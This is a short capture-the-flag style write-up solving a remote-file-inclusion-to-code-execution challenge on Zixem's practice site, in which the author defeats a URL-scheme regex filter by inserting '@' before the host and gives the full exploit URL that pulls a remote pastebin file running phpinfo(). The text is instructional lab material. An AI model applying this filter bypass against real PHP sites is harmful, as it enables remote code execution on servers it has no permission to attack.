RFI to RCE Challenge By Zixem (Writeup)

Zixem is an amazing guy who has designed some great SQL Injections, XSS and this write-up challenges. Today we will be solving RFI to RCE challenge.

This challenge can be found here.

There is only Level 1 for this challenge available on the website.

As per the challenge sayings. Our task is as above,

Task: Execute phpinfo() on this page from this remote file: http://pastebin.com/raw.php?i=DDSuhHcu via $_GET['page']. Good luck.

So we have been provided with a Remote File which contains the phpinfo() function which needed to be supplied via page parameter. The challenge is to include this file and get the RCE.

Remote File containing PHP Function

From the task we know that we need to add the page parameter following the Remote Link in order to get it executed. But on supplying it we have the hacking attempt error. We need to find another way to get ourselves out of this situation.

Let’s take a look onto the hind in order to better understand how things are working in PHP and what things are being checked.

We can clearly see that anything that matches

data|http|https|ftp://[Range].[Range]/i

It won’t be executed. This check seems similar to the pastebin link which is.

data|http|https|ftp://[Range].[Range]/i
http://pastebin.com/raw.php?i=DDSuhHcu

We somehow need to bypass this check in order to get our file executed or we can simply try to modify the URL by adding @ before pastebin.com like

http://www.zixem.altervista.org/RCE/level1.php?page=http://@pastebin.com/raw.php?i=DDSuhHcu

We have successfully completed the challenge :))

This was an easy challenge. I hope you liked the article.

Thanks for reading :))